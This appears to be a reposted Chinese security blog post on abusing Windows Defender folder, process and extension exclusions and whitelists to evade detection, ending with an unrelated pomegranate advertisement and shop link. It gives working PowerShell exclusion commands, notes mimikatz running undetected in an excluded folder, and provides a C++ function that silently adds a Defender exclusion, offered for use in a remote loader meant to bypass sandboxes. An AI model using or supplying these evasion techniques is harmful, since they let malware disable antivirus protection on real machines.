排除项
防病毒 (AV) 和端点检测与响应 (EDR) 解决方案是现代网络安全防御的重要组成部分。主要用在保护系统免受恶意活动的侵害。然而,它们并不完美,有时会干扰合法操作,导致误报或性能影响。所以,所有安全产品都会包含一项名为“信任区/排除项”的附加功能,用于忽略特定资产,例如路径、进程、文件和扩展名。
技术是把双刃剑,虽然此项功能实现了优化性能和减少误报,但同时也变相为攻击者提供了一个静默绕过的攻击面。滥用排除项可以成为一种强大而隐蔽的逃避检测的技术
以Windows 操作系统中默认使用的Windows Defender AV为例
Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionProcess, ExclusionExtension
滥用基于文件夹的排除
mimikatz在下载到非排除文件夹后立即被检测并删除
Set-MpPreference -ExclusionPath "C:WindowsTemp"
排除文件夹中执行相同操作时,Defender将变得鸦雀无声
滥用基于进程的排除
当你将某个进程添加到进程排除列表时,无论文件位于何处,Microsoft Defender Antivirus 都不会扫描该进程打开的文件https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
Set-MpPreference -ExclusionProcess "java.exe"
滥用基于扩展的排除
同上
Set-MpPreference -ExclusionExtension ".sec"
以上,这种攻击媒介我们可以添加到我们的BYPASS沙箱上线的远程加载器里
//添加Windows defender 排除项
void AddDefenderExclusion(const std::string& path) {
std::cout << "Adding Windows Defender exclusion for " << path << std::endl;
std::string command = "powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"" + path + "\""";
system(command.c_str());
}
白名单
说完了排除项我们来看白名单,这就是字符串杀软的魅力吗
以上,懂得都懂。甚至可以利用白进程轻松Kill:https://bbs.kanxue.com/thread-281120.htm
总结:
在现代网络安全中,排除项和白名单的功能虽然在优化性能和减少误报方面表现出色,但同时也给攻击者留下了可乘之机。
正如在网络安全中需要谨慎选择信任的元素,我们在生活中也同样需要关注选择,以提升我们的精力和专注力。在这个过程中,健康的饮食至关重要。比如,石榴不仅美味可口,还富含抗氧化剂,能够有效提高我们的能量水平,帮助我们在学习和工作时更加集中。
因此,当你在处理复杂问题时,不妨尝试加入石榴,让它为你的思维注入活力,帮助你在网络安全世界中更加敏锐和高效。
某学员家自己种的石榴,突尼斯软籽石榴,顺丰包邮
点此链接购买:https://shop.zhongkrg.cn/pages/goods_details/index?id=58
原文始发于微信公众号(老鑫安全):知“白”守黑:防病毒软件的致命弱点—排除项与白名单
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论